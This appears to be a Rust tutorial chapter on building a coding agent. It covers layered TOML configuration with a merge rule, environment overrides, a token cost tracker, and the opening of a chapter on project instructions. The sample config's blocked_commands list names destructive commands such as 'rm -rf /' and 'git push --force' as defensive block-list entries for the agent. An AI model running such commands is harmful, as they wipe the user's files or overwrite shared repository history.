  • Implement the merge() function with a single rule: every Some(_) in the overlay replaces the base.
  • Build ConfigLoader to assemble four layers (defaults, project config, user config, environment variables) in priority order.
  • Implement CostTracker to accumulate token counts and compute running cost estimates from per-million pricing.
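The merge rule from the goals -- every Some(_) in the overlay replaces the base -- can be sketched with a hypothetical two-field config (the real Config and ConfigOverlay have more fields, but every field follows the same pattern):

```rust
// Hypothetical two-field versions of the real structs.
#[derive(Debug, Clone, PartialEq)]
struct Config {
    model: String,
    max_tokens: u64,
}

#[derive(Default)]
struct Overlay {
    model: Option<String>,
    max_tokens: Option<u64>,
}

// One rule, applied field by field: Some(_) in the overlay wins,
// None falls through to the base.
fn merge(base: Config, overlay: Overlay) -> Config {
    Config {
        model: overlay.model.unwrap_or(base.model),
        max_tokens: overlay.max_tokens.unwrap_or(base.max_tokens),
    }
}

fn main() {
    let base = Config { model: "default-model".into(), max_tokens: 200_000 };
    let overlay = Overlay { model: Some("cheaper-model".into()), ..Default::default() };
    let merged = merge(base, overlay);

    // The overlay's Some(model) wins; the unset field falls through.
    assert_eq!(merged.model, "cheaper-model");
    assert_eq!(merged.max_tokens, 200_000);
    println!("ok");
}
```

This is why the overlay's fields are Option<T>: a plain Config could not distinguish "the TOML file did not mention max_tokens" from "the TOML file set max_tokens to the default value."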

Why layers?

A flat config file would be simple. One config.toml, one source of truth, done. But it breaks down immediately in practice:

  • User preferences like model choice and API base URL should follow you across every project. You should not have to set model = "anthropic/claude-sonnet-4-20250514" in every repository.
  • Project settings like blocked commands and protected file patterns are specific to one codebase. A node project might block rm -rf node_modules while a Rust project blocks cargo publish --allow-dirty.
  • Environment overrides let CI pipelines inject settings without touching config files. MINI_CLAW_MODEL=anthropic/claude-haiku-3-20250414 in a GitHub Actions workflow switches to a cheaper model for automated checks.
  • Defaults provide sane behavior when nothing is configured at all.

The solution is layered configuration. Each layer can set any field. Higher-priority layers override lower ones. Fields not set in a layer fall through to the next one down.

Priority (highest to lowest):

  1. Environment variables    MINI_CLAW_MODEL, MINI_CLAW_BASE_URL, MINI_CLAW_MAX_TOKENS
  2. User config              ~/.config/mini-claw/config.toml
  3. Project config            .claw/config.toml
  4. Defaults                  hardcoded in code

Claude Code uses the same approach. Its hierarchy goes: CLI flags > environment > user settings > project settings > defaults. The merge logic is more sophisticated -- it supports per-key overrides and array merging strategies -- but the architecture is identical.

flowchart TD
    A["Config::default()"] -->|merge| B["Project config<br/>.claw/config.toml"]
    B -->|merge| C["User config<br/>~/.config/mini-claw/config.toml"]
    C -->|override| D["Environment variables<br/>MINI_CLAW_MODEL, etc."]
    D --> E["Final Config"]

    style A fill:#e8e8e8
    style E fill:#c8e6c9
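As a concrete illustration of the layering (all values here are hypothetical), a project config might pin safety rules while the user config sets the model, with the environment variable winning over both:

```toml
# .claw/config.toml (project layer) -- safety rules specific to this repo
blocked_commands = ["cargo publish"]
protected_patterns = ["*.lock", ".env"]

# ~/.config/mini-claw/config.toml (user layer) -- follows you across projects
model = "anthropic/claude-sonnet-4-20250514"
```

Running with MINI_CLAW_MODEL set in the shell then overrides the model from both files, while the project's blocked_commands and protected_patterns fall through untouched.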

The Config struct

All configuration lives in a single Config struct in src/config.rs:

#![allow(unused)]
fn main() {
use std::path::{Path, PathBuf};

use serde::{Deserialize, Serialize};

#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Config {
    #[serde(default = "default_model")]
    pub model: String,

    #[serde(default = "default_base_url")]
    pub base_url: String,

    #[serde(default = "default_max_tokens")]
    pub max_context_tokens: u64,

    #[serde(default = "default_preserve_recent")]
    pub preserve_recent: usize,

    #[serde(default)]
    pub allowed_directory: Option<String>,

    #[serde(default)]
    pub protected_patterns: Vec<String>,

    #[serde(default)]
    pub blocked_commands: Vec<String>,

    #[serde(default)]
    pub instructions: Option<String>,
}
}

Eight fields spanning three categories: provider settings, safety settings, and agent behavior.

Provider settings

model identifies which LLM to use. The default is "anthropic/claude-sonnet-4-20250514" -- an OpenRouter model path. If a user routes through a different provider or wants a cheaper model for testing, they override this.

base_url is the API endpoint. The default points to OpenRouter (https://openrouter.ai/api/v1). Users running a local proxy, a corporate gateway, or a different OpenAI-compatible API change this to point at their endpoint.

max_context_tokens caps the context window at 200,000 tokens. A compaction engine would read this value to decide when to summarize old messages. Different models have different context limits -- Haiku supports 200K, but a self-hosted model might only handle 8K.

Safety settings

allowed_directory restricts file operations to a single directory tree. When set, the Write, Edit, and Read tools refuse to touch anything outside this path. This is a blunt but effective sandbox -- useful in CI where the agent should only modify the checkout directory.

protected_patterns is a list of glob patterns for files that cannot be written to. A project might protect *.lock files, .env, or Cargo.toml to prevent the agent from accidentally modifying build-critical files.

blocked_commands lists command substrings that the bash tool rejects. If any blocked substring appears in a command, execution is denied. This is the configuration surface for the safety checks from Chapter 14.
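The substring check described above can be sketched in a few lines. This is an illustrative stand-in, not the starter's actual API -- the hypothetical is_blocked helper just mirrors the "any blocked substring appearing anywhere denies the command" rule:

```rust
// Hypothetical sketch of the blocked_commands substring check.
// `is_blocked` is illustrative, not a function from the starter codebase.
fn is_blocked(command: &str, blocked: &[String]) -> bool {
    // Deny if any blocked substring appears anywhere in the command.
    blocked.iter().any(|b| command.contains(b.as_str()))
}

fn main() {
    let blocked = vec!["rm -rf /".to_string(), "git push --force".to_string()];
    assert!(is_blocked("git push --force origin main", &blocked));
    assert!(!is_blocked("git push origin main", &blocked));
}
```

Note that substring matching is deliberately coarse: it can over-block (a comment containing the phrase), but it never requires parsing shell syntax.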

Agent behavior

preserve_recent controls how many recent messages the compaction engine preserves. When compacting, the engine summarizes older messages but keeps the most recent preserve_recent messages intact so the model has fresh context. The default of 10 keeps roughly the last 2-3 tool-use rounds.

instructions injects custom text into the system prompt. This is where project-specific guidance goes -- "always use async/await", "prefer Vec over slices in public APIs", "tests must use the mock provider". Chapter 18 builds the full instruction system; this field is the config hook for it.

Key Rust concept: #[serde(default)] for partial deserialization

Serde's default attribute is what makes partial config files work. When a TOML file omits a field, serde normally fails with "missing field." The #[serde(default = "function_name")] attribute tells serde to call the named function instead of failing. For fields that default to None or empty Vec, the simpler #[serde(default)] calls Default::default(). This pattern is idiomatic in Rust configuration: every field has a sensible default, and the user only specifies what they want to change. The alternative -- requiring every field in every config file -- would make partial configs impossible.

Default functions and the serde trick

Each field with a non-trivial default uses a named function:

#![allow(unused)]
fn main() {
fn default_model() -> String {
    "anthropic/claude-sonnet-4-20250514".into()
}

fn default_base_url() -> String {
    "https://openrouter.ai/api/v1".into()
}

fn default_max_tokens() -> u64 {
    200_000
}

fn default_preserve_recent() -> usize {
    10
}
}

The #[serde(default = "default_model")] attribute tells serde to call default_model() when the model field is missing from the TOML input. This is what makes partial config files work. A project config that only sets blocked_commands still deserializes into a full Config -- every omitted field gets its default.

Fields that default to "empty" (Option<String>, Vec<String>) use the simpler #[serde(default)] attribute, which calls Default::default() -- None for Option, empty Vec for collections.

The Default impl for Config mirrors these functions exactly:

#![allow(unused)]
fn main() {
impl Default for Config {
    fn default() -> Self {
        Self {
            model: default_model(),
            base_url: default_base_url(),
            max_context_tokens: default_max_tokens(),
            preserve_recent: default_preserve_recent(),
            allowed_directory: None,
            protected_patterns: Vec::new(),
            blocked_commands: Vec::new(),
            instructions: None,
        }
    }
}
}

Having both the Default impl and the serde defaults is intentional. Config::default() is used in code -- constructing a base config, comparing against defaults in the merge logic. The #[serde(default = "...")] attributes are used during deserialization. They must agree, and sharing the same named functions guarantees they do.


The overlay: telling "unset" from "set to default"

Before we can write the merge function, we need a way to answer a question that Config itself cannot answer: was this field actually set in the TOML file?

A natural first attempt is "compare the overlay value against Config::default() -- if it differs, it was set." That heuristic is wrong. It cannot distinguish two different situations:

  1. The user did not set the field in their TOML.
  2. The user did set the field, and the value they set happens to equal the default.

Case 2 is not hypothetical. If the default model is "anthropic/claude-sonnet-4-20250514" and the user explicitly writes model = "anthropic/claude-sonnet-4-20250514" in their user config to assert it regardless of project overrides, the comparison-to-default heuristic silently treats it as "not set" and keeps whatever the previous layer had. Last-write-wins is violated.

The fix is to encode "set" vs "not set" in the type system. We introduce a second struct -- ConfigOverlay -- whose fields are Option<T>. Serde deserializes a missing TOML key as None and a present one as Some(value). No value comparison needed.

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Default, Deserialize)]
#[serde(default)]
pub struct ConfigOverlay {
    pub model: Option<String>,
    pub base_url: Option<String>,
    pub max_context_tokens: Option<u64>,
    pub preserve_recent: Option<usize>,
    pub allowed_directory: Option<String>,
    pub protected_patterns: Option<Vec<String>>,
    pub blocked_commands: Option<Vec<String>>,
    pub instructions: Option<String>,
}
}

The struct-level #[serde(default)] tells serde to fall back to Default::default() for any field missing from the TOML input -- and Default::default() for Option<T> is None. That is exactly the "key absent → None" mapping we want, and we get it without annotating every field individually.

The two structs play complementary roles. Config is the fully-resolved output: every field has a value, everyone downstream can read it without caring how it got there. ConfigOverlay is the transport format: a partial, optional view of the same shape, used only while merging layers.

Even Vec<T> fields become Option<Vec<T>>. This matters -- an overlay that sets protected_patterns = [] in TOML means "clear the list," which is different from "did not mention the list at all." An Option<Vec<T>> represents both cases cleanly; a bare Vec<T> cannot.
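The three states can be made concrete with a small stand-alone sketch (not the starter's code) -- a bare Vec<T> could only represent the last two:

```rust
// Minimal illustration of why Option<Vec<T>> captures a state a bare
// Vec<T> cannot: "field absent" vs "field explicitly set to empty".
fn describe(patterns: &Option<Vec<String>>) -> &'static str {
    match patterns {
        None => "layer did not mention the field",            // key absent in TOML
        Some(v) if v.is_empty() => "layer cleared the list",  // key = []
        Some(_) => "layer set concrete patterns",             // key = ["..."]
    }
}

fn main() {
    assert_eq!(describe(&None), "layer did not mention the field");
    assert_eq!(describe(&Some(vec![])), "layer cleared the list");
    assert_eq!(
        describe(&Some(vec![".env".to_string()])),
        "layer set concrete patterns"
    );
}
```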

The merge logic

With the overlay in hand, merge becomes uniform: every Some(_) in the overlay replaces the corresponding field in the base, and every None leaves the base untouched.

#![allow(unused)]
fn main() {
pub fn merge(base: Config, overlay: ConfigOverlay) -> Config {
    Config {
        model: overlay.model.unwrap_or(base.model),
        base_url: overlay.base_url.unwrap_or(base.base_url),
        max_context_tokens: overlay.max_context_tokens.unwrap_or(base.max_context_tokens),
        preserve_recent: overlay.preserve_recent.unwrap_or(base.preserve_recent),
        allowed_directory: overlay.allowed_directory.or(base.allowed_directory),
        protected_patterns: overlay.protected_patterns.unwrap_or(base.protected_patterns),
        blocked_commands: overlay.blocked_commands.unwrap_or(base.blocked_commands),
        instructions: overlay.instructions.or(base.instructions),
    }
}
}

Two patterns cover every field:

  • unwrap_or(base.x) for fields where Config holds a concrete value (e.g. String, u64, Vec<String>). If the overlay has Some(v), the result is v; otherwise the base value is kept.
  • .or(base.x) for fields that are already Option<T> on Config (allowed_directory, instructions). Option::or returns the first Some(_) it finds.

That is the entire merge. No value comparisons. No special cases per field. A later layer always wins when it sets a field, regardless of whether the value it sets matches the default, matches the previous layer, or is empty.
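To see last-write-wins in action, here is a scaled-down version with two representative fields. MiniConfig and MiniOverlay are illustrative stand-ins for Config and ConfigOverlay, but the merge rule is the same:

```rust
// Scaled-down sketch of the merge rule. `MiniConfig`/`MiniOverlay` are
// illustrative stand-ins for the chapter's Config/ConfigOverlay.
#[derive(Debug)]
struct MiniConfig {
    model: String,
    blocked_commands: Vec<String>,
}

struct MiniOverlay {
    model: Option<String>,
    blocked_commands: Option<Vec<String>>,
}

fn merge(base: MiniConfig, overlay: MiniOverlay) -> MiniConfig {
    MiniConfig {
        model: overlay.model.unwrap_or(base.model),
        blocked_commands: overlay.blocked_commands.unwrap_or(base.blocked_commands),
    }
}

fn main() {
    let base = MiniConfig {
        model: "default-model".to_string(),
        blocked_commands: vec!["rm -rf /".to_string()],
    };
    // The overlay re-asserts a value equal to the base: it is still Some(_),
    // so it wins. No comparison against the base value ever happens.
    let overlay = MiniOverlay {
        model: Some("default-model".to_string()),
        blocked_commands: None, // field not mentioned: base is kept
    };
    let merged = merge(base, overlay);
    assert_eq!(merged.model, "default-model");
    assert_eq!(merged.blocked_commands, vec!["rm -rf /".to_string()]);
}
```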

Collections: replace, not append

When an overlay does set protected_patterns or blocked_commands, its value fully replaces the base. Appending would mean every config layer adds to the list with no way to remove entries from a lower layer. Replacing gives each layer that mentions the field full control over its contents.

Consider a project that protects .env and .secret at the project level. If the user config also sets protected_patterns = [".credentials"], the replace strategy means only .credentials is protected -- the project patterns are gone. Since project config is loaded first (lowest priority among files) and user config is loaded second (higher priority), the user config's patterns replace the project's. For most settings this makes sense -- the user knows their environment better than the project author.

If you wanted append semantics, you would extend the collections instead:

#![allow(unused)]
fn main() {
// Append (not what we do):
if let Some(extra) = overlay.protected_patterns {
    base.protected_patterns.extend(extra);
}
}

Claude Code supports both strategies depending on the field. Our implementation keeps it simple with replace-only, and the overlay's Option<Vec<T>> type is what lets "layer did not mention this field" stay distinct from "layer explicitly set it to an empty list."


ConfigLoader: assembling the layers

The ConfigLoader orchestrates the full merge pipeline:

#![allow(unused)]
fn main() {
pub struct ConfigLoader {
    project_dir: Option<PathBuf>,
}

impl ConfigLoader {
    pub fn new() -> Self {
        Self { project_dir: None }
    }

    pub fn project_dir(mut self, dir: impl Into<PathBuf>) -> Self {
        self.project_dir = Some(dir.into());
        self
    }

    pub fn load(&self) -> Config {
        let mut config = Config::default();

        // Layer 1: Project config (.claw/config.toml)
        if let Some(ref dir) = self.project_dir {
            let project_path = dir.join(".claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&project_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 2: User config (~/.config/mini-claw/config.toml)
        if let Some(user_dir) = dirs::config_dir() {
            let user_path = user_dir.join("mini-claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&user_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 3: Environment variables (highest priority)
        config = Self::apply_env(config);

        config
    }
}
}

The builder pattern lets callers optionally specify a project directory. In a real agent, this is the working directory where the user invoked the tool. In tests, it is a temp directory.

The load order matters

The load() method applies layers from lowest to highest priority:

  1. Start with Config::default() -- the absolute baseline.
  2. Merge the project config (.claw/config.toml) -- project-specific overrides.
  3. Merge the user config (~/.config/mini-claw/config.toml) -- user-wide preferences.
  4. Apply environment variables -- the ultimate override.

Each merge takes the current accumulated config as the base and the new layer as the overlay. Every field the overlay actually sets replaces the base, whether or not the new value differs from the default. This means user config beats project config, and environment variables beat everything.

The dirs::config_dir() call uses the dirs crate to find the platform-appropriate config directory -- ~/.config on Linux, ~/Library/Application Support on macOS, %APPDATA% on Windows. This follows the XDG Base Directory Specification on Linux and platform conventions elsewhere.

Loading a single file

#![allow(unused)]
fn main() {
pub fn load_file(path: &Path) -> Option<ConfigOverlay> {
    let content = std::fs::read_to_string(path).ok()?;
    toml::from_str(&content).ok()
}
}

Two lines, two possible failure points, both collapsed to None:

  1. The file might not exist -- read_to_string returns Err, .ok() converts it to None, and ? returns early.
  2. The file might contain invalid TOML -- toml::from_str returns Err, and .ok() turns it into None, which is the function's return value.

Notice the return type is Option<ConfigOverlay>, not Option<Config>. The loader deliberately parses into the partial type -- that is how merge later knows which fields the file actually mentioned.

Returning Option<_> instead of Result<_, Error> is a deliberate choice. Missing config files are not errors -- they are the normal case. Most users will not have a user config file. Most projects will not have a .claw/config.toml. The loader should silently skip missing files and apply defaults. Invalid TOML is arguably an error worth reporting, but for simplicity we treat it the same way. A production implementation would log a warning for parse failures while still falling back to defaults.
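The "missing file is not an error" half of this can be demonstrated without the toml crate. This sketch covers only the file-reading step of load_file; the real function then feeds the string to toml::from_str:

```rust
use std::path::Path;

// Sketch of the file-reading half of load_file: a missing file becomes
// None rather than an error. (The toml parsing step is omitted here to
// keep the example dependency-free.)
fn read_optional(path: &Path) -> Option<String> {
    std::fs::read_to_string(path).ok()
}

fn main() {
    // A path that should not exist: the normal, silently-skipped case.
    let missing = Path::new("/definitely/not/a/real/config.toml");
    assert!(read_optional(missing).is_none());
}
```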

The toml crate handles deserialization. Because every field on ConfigOverlay is Option<T> with #[serde(default)], a TOML file that only sets one field still parses cleanly -- every other field becomes None:

# This is a valid config file:
model = "anthropic/claude-haiku-3-20250414"

This deserializes into a ConfigOverlay with model: Some(...) and every other field None. When merge applies it, only model is touched on the base.

Environment variable overrides

#![allow(unused)]
fn main() {
fn apply_env(mut config: Config) -> Config {
    if let Ok(model) = std::env::var("MINI_CLAW_MODEL") {
        config.model = model;
    }
    if let Ok(url) = std::env::var("MINI_CLAW_BASE_URL") {
        config.base_url = url;
    }
    if let Ok(tokens) = std::env::var("MINI_CLAW_MAX_TOKENS") {
        if let Ok(n) = tokens.parse::<u64>() {
            config.max_context_tokens = n;
        }
    }
    config
}
}

Environment variables are the simplest layer -- no files, no parsing, no merge logic. If the variable exists, its value replaces the field. If it does not exist, the field is untouched.

Only three fields have environment variable support: model, base_url, and max_context_tokens. These are the fields most commonly overridden in CI and scripting contexts. Safety fields like blocked_commands and protected_patterns are intentionally excluded from environment overrides -- you do not want a compromised environment variable to disable your safety rules.

Notice the double-parse for MINI_CLAW_MAX_TOKENS: first std::env::var to get the string, then .parse::<u64>() to convert it to a number. If the string is not a valid integer, the parse silently fails and the existing value is kept. No panic, no error message. This is the right behavior for environment variables -- a typo in MINI_CLAW_MAX_TOKENS=abc should not crash the agent.
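The parse-or-keep behavior can be isolated into a pure function -- a sketch, not the starter's code, with the environment lookup abstracted away as an Option<&str> so the fallback logic is easy to test:

```rust
// Sketch of the double-parse fallback: an unset variable or a malformed
// value leaves the current setting untouched. `apply_max_tokens` is an
// illustrative helper, not part of the starter codebase.
fn apply_max_tokens(current: u64, raw: Option<&str>) -> u64 {
    raw.and_then(|s| s.parse::<u64>().ok()).unwrap_or(current)
}

fn main() {
    assert_eq!(apply_max_tokens(200_000, None), 200_000);        // variable unset
    assert_eq!(apply_max_tokens(200_000, Some("abc")), 200_000); // typo: kept
    assert_eq!(apply_max_tokens(200_000, Some("8000")), 8000);   // valid: replaced
}
```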


CostTracker: knowing what you spend

Every LLM API call costs money. The cost depends on two factors: how many tokens you send (input) and how many tokens the model generates (output). Different models have wildly different pricing -- Claude Sonnet is roughly $3 per million input tokens and $15 per million output tokens, while Haiku is an order of magnitude cheaper.

A coding agent makes many API calls per session. A complex task might run 20-30 tool-use turns, each sending the full conversation history. Without tracking, you have no idea whether a session cost $0.02 or $2.00. The CostTracker accumulates token counts across a session and computes the running cost.

#![allow(unused)]
fn main() {
pub struct CostTracker {
    input_tokens: u64,
    output_tokens: u64,
    turn_count: u64,
    input_price_per_million: f64,
    output_price_per_million: f64,
}
}

Five fields. The first three are accumulators that grow with each API call. The last two are constants set at construction time based on the model's pricing.

Construction

#![allow(unused)]
fn main() {
impl CostTracker {
    pub fn new(input_price_per_million: f64, output_price_per_million: f64) -> Self {
        Self {
            input_tokens: 0,
            output_tokens: 0,
            turn_count: 0,
            input_price_per_million,
            output_price_per_million,
        }
    }
}
}

The caller provides pricing. For Claude Sonnet: CostTracker::new(3.0, 15.0). For Haiku: CostTracker::new(0.25, 1.25). This separates the tracker from model-specific knowledge -- it just counts tokens and multiplies by rates.

Recording usage

#![allow(unused)]
fn main() {
pub fn record(&mut self, usage: &crate::types::TokenUsage) {
    self.input_tokens += usage.input_tokens;
    self.output_tokens += usage.output_tokens;
    self.turn_count += 1;
}
}

Called after each provider response. The TokenUsage struct (from Chapter 4) carries the per-request token counts. The tracker accumulates them and increments the turn counter.

Note that record takes a reference to TokenUsage, not ownership. The caller typically has the usage attached to an AssistantTurn and should not have to give it up just to record costs.

Computing cost

#![allow(unused)]
fn main() {
pub fn total_cost(&self) -> f64 {
    let input_cost = self.input_tokens as f64 * self.input_price_per_million / 1_000_000.0;
    let output_cost = self.output_tokens as f64 * self.output_price_per_million / 1_000_000.0;
    input_cost + output_cost
}
}

Straightforward arithmetic. Input tokens times input price per million, divided by a million. Same for output. Add them together. The result is in USD.

For a session with 100 input tokens at $3/M and 50 output tokens at $15/M:

input:  100 * 3.0  / 1,000,000 = 0.0003
output:  50 * 15.0 / 1,000,000 = 0.00075
total:                           0.00105

That is $0.00105 -- about a tenth of a cent. A typical interactive session costs $0.05-$0.50 depending on complexity and model choice.

Summary formatting

#![allow(unused)]
fn main() {
pub fn summary(&self) -> String {
    format!(
        "tokens: {} in + {} out | cost: ${:.4}",
        self.input_tokens,
        self.output_tokens,
        self.total_cost()
    )
}
}

Produces a string like "tokens: 5000 in + 1000 out | cost: $0.0300". Four decimal places gives sub-cent precision. A TUI would display this in the status bar -- a constant reminder of what the session is costing.

Reset

#![allow(unused)]
fn main() {
pub fn reset(&mut self) {
    self.input_tokens = 0;
    self.output_tokens = 0;
    self.turn_count = 0;
}
}

Zeroes the accumulators but keeps the pricing. Useful when starting a new logical task within the same session, or for per-conversation cost tracking in a multi-conversation agent.

Accessor methods

The tracker exposes its accumulators through read-only methods:

#![allow(unused)]
fn main() {
pub fn total_input_tokens(&self) -> u64 { self.input_tokens }
pub fn total_output_tokens(&self) -> u64 { self.output_tokens }
pub fn turn_count(&self) -> u64 { self.turn_count }
}

These let the UI and logging systems read the state without mutation. The fields themselves are private -- the only way to modify them is through record() and reset(), which keeps the accounting consistent.
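The whole flow -- construct, record, summarize -- fits in one self-contained run. The struct and methods are restated here so the example compiles on its own (record takes raw counts instead of the TokenUsage struct to avoid pulling in the crate's types), using the same Sonnet pricing the chapter quotes:

```rust
// Self-contained restatement of the tracker for demonstration purposes.
// `record` takes raw token counts here instead of &TokenUsage.
struct CostTracker {
    input_tokens: u64,
    output_tokens: u64,
    turn_count: u64,
    input_price_per_million: f64,
    output_price_per_million: f64,
}

impl CostTracker {
    fn new(input_price_per_million: f64, output_price_per_million: f64) -> Self {
        Self {
            input_tokens: 0,
            output_tokens: 0,
            turn_count: 0,
            input_price_per_million,
            output_price_per_million,
        }
    }

    fn record(&mut self, input: u64, output: u64) {
        self.input_tokens += input;
        self.output_tokens += output;
        self.turn_count += 1;
    }

    fn total_cost(&self) -> f64 {
        self.input_tokens as f64 * self.input_price_per_million / 1_000_000.0
            + self.output_tokens as f64 * self.output_price_per_million / 1_000_000.0
    }

    fn summary(&self) -> String {
        format!(
            "tokens: {} in + {} out | cost: ${:.4}",
            self.input_tokens, self.output_tokens, self.total_cost()
        )
    }
}

fn main() {
    let mut tracker = CostTracker::new(3.0, 15.0); // Sonnet pricing
    tracker.record(5000, 1000);                    // one provider turn
    assert_eq!(tracker.turn_count, 1);
    assert_eq!(tracker.summary(), "tokens: 5000 in + 1000 out | cost: $0.0300");
}
```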


Putting it together: a sample config file

Here is what a project's .claw/config.toml might look like:

model = "anthropic/claude-sonnet-4-20250514"
max_context_tokens = 100000

protected_patterns = [".env", "*.lock", "secrets/*"]
blocked_commands = ["rm -rf /", "git push --force"]

instructions = "Always run cargo fmt after editing Rust files."

And a user's ~/.config/mini-claw/config.toml:

model = "anthropic/claude-sonnet-4-20250514"
base_url = "https://my-proxy.example.com/v1"

When both exist, the loader merges them:

  1. Defaults -- all fields get their default values.
  2. Project config parses into a ConfigOverlay with Some(_) for exactly the keys the file mentions: model, max_context_tokens, protected_patterns, blocked_commands, instructions. merge applies each one to the base.
  3. User config parses into an overlay with Some(_) for model and base_url. Even though its model value happens to equal the default, that no longer matters -- the overlay says the field was set, so it replaces the project's value. base_url likewise replaces the default.
  4. Environment -- if MINI_CLAW_MODEL is set, it overrides everything.

The final config has the project's safety rules, the user's model and proxy URL, and defaults for everything else. Each layer contributes what it knows without needing to repeat what it does not care about, and a layer is never silently ignored just because the value it set coincides with the default.


How Claude Code does it

Claude Code has a similar 4-level hierarchy: project settings, user settings, environment, defaults. The details differ in instructive ways.

Format. Claude Code uses JSON (settings.json, settings.local.json) rather than TOML. JSON is more familiar to web developers (Claude Code's primary audience) and integrates naturally with TypeScript. We use TOML because it is the Rust ecosystem standard -- every Rust developer already reads Cargo.toml daily.

Merge sophistication. Claude Code supports per-key override strategies. Some fields append (permission rules accumulate across layers), some replace (model name), and some use first-wins semantics (project instructions take precedence over user instructions for the same key). Our merge logic uses a single strategy: every field the overlay set replaces the base, collections included. Simpler, but it covers the common cases.

Cost tracking. Claude Code tracks costs per model with cache-aware pricing. When the API reports cache_read_tokens, those tokens are billed at a reduced rate (typically 90% cheaper than regular input tokens). Our CostTracker ignores caching -- it treats all input tokens the same. Adding cache-aware pricing would mean extending record() to accept cache_read_tokens and applying a separate rate, but the architecture does not change.

Validation. Claude Code validates settings on load -- unknown keys produce warnings, type mismatches produce errors. Our load_file silently drops unparseable files. A production implementation would validate and report.

Despite these differences, the layered architecture is the same. Settings flow from general (defaults) to specific (environment), each layer overriding the previous. The Config struct is the single source of truth for the entire agent, passed to every subsystem that needs to know how to behave.


Tests

Run the tests:

cargo test -p mini-claw-code-starter config  # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker  # CostTracker

Note: Config and ConfigLoader tests are in config (following the V1 numbering where configuration was Chapter 16). CostTracker tests are in cost_tracker (V1 token tracking chapter).

Key config tests (config):

  • test_config_default_config -- Config::default() produces the expected model, token limit, and non-empty safety defaults.
  • test_config_load_from_toml -- A TOML string with model and max_context_tokens deserializes correctly.
  • test_config_default_fills_missing_fields -- A TOML file with only model still gets defaults for preserve_recent, instructions, etc.
  • test_config_load_nonexistent_path -- Loading from a non-existent path returns None instead of panicking.
  • test_config_mcp_server_config -- MCP server configuration round-trips through TOML correctly.
  • test_config_hooks_config -- Hook configuration (command, tool_pattern, timeout) deserializes from TOML.
  • test_config_env_override -- Setting MINI_CLAW_MODEL environment variable overrides the model in the loaded config.
  • test_config_protected_patterns_default -- Default config includes .env and .git/** in protected patterns.

Key cost tracker tests (cost_tracker):

  • test_cost_tracker_empty_tracker -- A new tracker starts at zero tokens, zero turns, zero cost.
  • test_cost_tracker_record_single_turn -- Recording one turn increments input/output tokens and the turn counter.
  • test_cost_tracker_accumulates_across_turns -- Three record() calls accumulate totals correctly.
  • test_cost_tracker_cost_calculation -- 1M input + 1M output tokens at $3/$15 per million = $18.00.
  • test_cost_tracker_cost_small_numbers -- 1000 input + 200 output tokens = $0.006.
  • test_cost_tracker_summary_format -- summary() produces the expected "tokens: N in + N out | cost: $X.XXXX" format.
  • test_cost_tracker_reset -- reset() zeroes accumulators but preserves pricing.

Key takeaway

Layered configuration lets each level (defaults, project, user, environment) contribute only what it knows. Splitting the shape into a fully-resolved Config and a partial ConfigOverlay (fields are Option<T>) puts the "was this field set?" question in the type system: None means the file did not mention it, Some(v) means it did -- regardless of what v is. Merge then has a single rule: every Some(_) replaces the base.


Recap

This chapter built two subsystems that the rest of the agent depends on.

  • Config holds every configurable parameter in a single struct. Serde's #[serde(default)] attributes make partial TOML files work -- you only set what you want to change.

  • ConfigOverlay is the partial counterpart to Config: every field is Option<T>. None means the field was not set in the layer, Some(v) means it was -- and stays distinguishable from the default even when v happens to equal the default.

  • ConfigLoader implements the 4-level merge pipeline: defaults, project config, user config, environment variables. Each file layer is parsed into a ConfigOverlay and applied with a single rule: every Some(_) replaces the base.

  • CostTracker accumulates token usage across a session and computes estimated cost from per-million pricing. Its summary() method produces the one-line status string the TUI displays.

  • The merge strategy is the key design decision. Encoding "set vs unset" in the type system (instead of guessing from the value) guarantees last-write-wins and makes explicit resets -- clearing a list, re-asserting a default -- work correctly.

  • Environment variables are deliberately limited to three fields. Safety-critical settings like blocked_commands and protected_patterns should come from config files that are checked into source control or managed explicitly -- not from environment variables that might be manipulated.


What's next

Configuration tells the agent how to behave. Chapter 18 -- Project Instructions -- tells it what to know. The instructions field you saw in Config is just a string. The instruction system reads CLAUDE.md files from the project tree, merges them with user instructions, and injects them into the system prompt. Together, settings and instructions make the agent context-aware -- it adapts its behavior and knowledge to each project it works in.

Check yourself


← Chapter 16: Plan Mode · Contents · Chapter 18: Project Instructions →

Chapter 18: Project Instructions & Context Management

File(s) to edit: src/context.rs
Tests to run: cargo test -p mini-claw-code-starter instructions (InstructionLoader), cargo test -p mini-claw-code-starter context_manager (ContextManager)
Estimated time: 40 min

This chapter closes the loop on two pieces that keep an agent running over a long session:

  • InstructionLoader (built in Chapter 8) discovers CLAUDE.md files by walking up the filesystem. We revisit it here to see how its output gets injected into the conversation at session start.
  • ContextManager (new in this chapter) keeps the conversation inside the model's context window by summarising old turns once the token budget is exceeded. This is the piece you fill in.

In Chapter 17 you added Config, a layered settings hierarchy. One of its fields is instructions: Option<String> -- custom text the user can put in a TOML config file and have injected into the system prompt.

This chapter wires all three together. It is the chapter where your agent becomes project-aware (launching from /home/user/project/backend picks up different CLAUDE.md files than /home/user/other) and session-durable (a 20-turn debugging session does not hit the context wall).

cargo test -p mini-claw-code-starter instructions  # InstructionLoader
cargo test -p mini-claw-code-starter context_manager  # ContextManager

Goal

  • Understand how InstructionLoader output and Config.instructions get injected as system messages at session start.
  • Implement ContextManager::record so token usage from each turn accumulates into a running total.
  • Implement ContextManager::compact so that once the budget is exceeded, the middle of the message history is replaced by an LLM-generated summary while the system prompt and the most recent messages are preserved intact.
  • Understand why the system prompt (which includes discovered CLAUDE.md content) must survive compaction unchanged -- it is the one message the LLM needs on every turn.

The session-level pipeline

Here is the complete flow. At session start instructions are discovered and pushed into the message history. During the session the ContextManager watches token usage and compacts the middle of that history once the budget is exceeded.

  ┌─────────────────────────────┐
  │  Filesystem                 │      (at session start)
  │                             │
  │  /home/user/CLAUDE.md       │──┐
  │  /home/user/project/        │  │
  │    CLAUDE.md                │──┤  InstructionLoader::discover()
  │    backend/                 │  │  walks upward, collects paths
  │      CLAUDE.md              │──┤
  │      .claw/instructions.md  │──┘
  └─────────────────────────────┘
              │
              ▼
  ┌─────────────────────────────┐
  │  InstructionLoader::load()  │
  │  concatenates with headers  │
  │  and --- separators         │
  └─────────────────────────────┘
